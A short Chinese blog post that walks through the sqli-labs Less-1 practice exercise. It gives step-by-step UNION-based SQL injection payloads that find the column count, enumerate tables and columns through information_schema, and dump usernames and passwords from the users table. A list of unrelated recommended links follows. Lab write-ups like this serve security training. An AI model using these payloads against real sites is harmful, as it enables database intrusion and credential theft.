sql注入——靶场Less1

?id=1

?id=99'union select 1,2,3--+

查看占位

?id=1' order by 3--+

尝试出表有几列

?id=1' order by 4--+

说明只有三列

?id=99' union select 1,database(),3--+

查询当前使用的数据库的名称

?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+

查询security表中有哪些表

?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查询users表中有哪些信息

?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

展示所有users表中的信息

相关推荐
古月居GYH2 小时前
【数据分析】如何在PyCharm中高效配置和使用SQL
ide·sql·pycharm
计算机毕设定制辅导-无忧学长6 小时前
西门子 PLC 与 Modbus 集成:S7-1500 RTU/TCP 配置指南(一)
服务器·数据库·tcp/ip
程序员柳7 小时前
基于微信小程序的校园二手交易平台、微信小程序校园二手商城源代码+数据库+使用说明,layui+微信小程序+Spring Boot
数据库·微信小程序·layui
梦在深巷、7 小时前
MySQL/MariaDB数据库主从复制之基于二进制日志的方式
linux·数据库·mysql·mariadb
IT乌鸦坐飞机7 小时前
ansible部署数据库服务随机启动并创建用户和设置用户有完全权限
数据库·ansible·centos7
IT_10247 小时前
Spring Boot项目开发实战销售管理系统——数据库设计!
java·开发语言·数据库·spring boot·后端·oracle
祁思妙想9 小时前
八股学习(三)---MySQL
数据库·学习·mysql
惊骇世俗王某人9 小时前
1.MySQL之如何定位慢查询
数据库·mysql
程序员张39 小时前
SQL分析与打印-p6spy组件
spring boot·sql·mybatis·mybatisplus·p6spy
秦歌66610 小时前
向量数据库-Milvus快速入门
数据库·milvus